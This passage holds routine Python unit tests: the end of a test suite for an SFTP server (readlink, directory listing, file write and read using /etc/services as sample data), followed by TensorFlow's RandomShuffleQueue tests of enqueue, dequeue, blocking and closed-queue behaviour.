os.symlink("infound", remote_file("foo"))
self.server.input_queue = sftpcmd(
SSH2_FXP_READLINK, sftpstring(b'foo'), sftpint(0))
self.server.process()
link = get_sftpname(self.server.output_queue)
self.assertEqual(link, b"infound")
self.server.output_queue = b''
f = {b'.', b'..', b'foo'}
self.server.input_queue = sftpcmd(
SSH2_FXP_OPENDIR,
sftpstring(b'.')
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
l = set()
while (True):
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READDIR,
sftpstring(handle),
)
try:
self.server.process()
filename = get_sftpname(self.server.output_queue)
l.add(filename)
except:
break
self.assertEqual(l, f)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
def test_init(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_INIT, sftpint(2), sftpint(0)
)
self.server.process()
version = get_sftpint(self.server.output_queue)
self.assertEqual(version, SSH2_FILEXFER_VERSION)
def test_rmdir_notfound(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_RMDIR, sftpstring(b'bad/ugly'), sftpint(0))
self.assertRaises(SFTPNotFound, self.server.process)
def test_copy_services(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE | SSH2_FXF_READ),
sftpint(SSH2_FILEXFER_ATTR_PERMISSIONS),
sftpint(0o644)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
etc_services = open('/etc/services', 'rb').read()
etc_services_size = \
os.lstat('/etc/services').st_size # size of the whole file
self.server.input_queue = sftpcmd(
SSH2_FXP_WRITE,
sftpstring(handle),
sftpint64(0),
sftpstring(etc_services)
)
self.server.process()
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READ,
sftpstring(handle),
sftpint64(0),
sftpint(
etc_services_size
)
)
self.server.process()
data = get_sftpdata(self.server.output_queue)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READ,
sftpstring(handle),
sftpint64(etc_services_size),
sftpint(1) # wait for the EOF
)
# EOF status is raised as an exception
self.assertRaises(SFTPException, self.server.process)
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
r_services = remote_file('services')
self.assertEqual(
etc_services,
open(r_services, 'rb').read()
)
self.assertEqual(
etc_services,
data
)
self.assertEqual(
0o644,
stat.S_IMODE(os.lstat(r_services).st_mode)
)
self.assertEqual(
etc_services_size,
os.lstat(r_services).st_size
)
os.unlink(r_services)
def tearDown(self):
"""Clean any leftover."""
for f in os.listdir(LOCAL_ROOT):
try:
os.unlink(f)
except:
rmtree(f)
for f in os.listdir(REMOTE_ROOT):
f = remote_file(f)
try:
os.unlink(f)
except:
rmtree(f)
@classmethod
def teardown_class(cls):
"""Clean the created directories."""
rmtree(LOCAL_ROOT, ignore_errors=True)
os.unlink(t_path("log")) # comment me to see the log!
if __name__ == "__main__":
unittest.main()
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
@test_util.run_v1_only("RandomShuffleQueue removed from v2")
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
results.append((a, b))
a, b = self.evaluate(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
def blocking_dequeue():
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, self.evaluate(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(self.evaluate(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(self.evaluate(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(self.evaluate(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
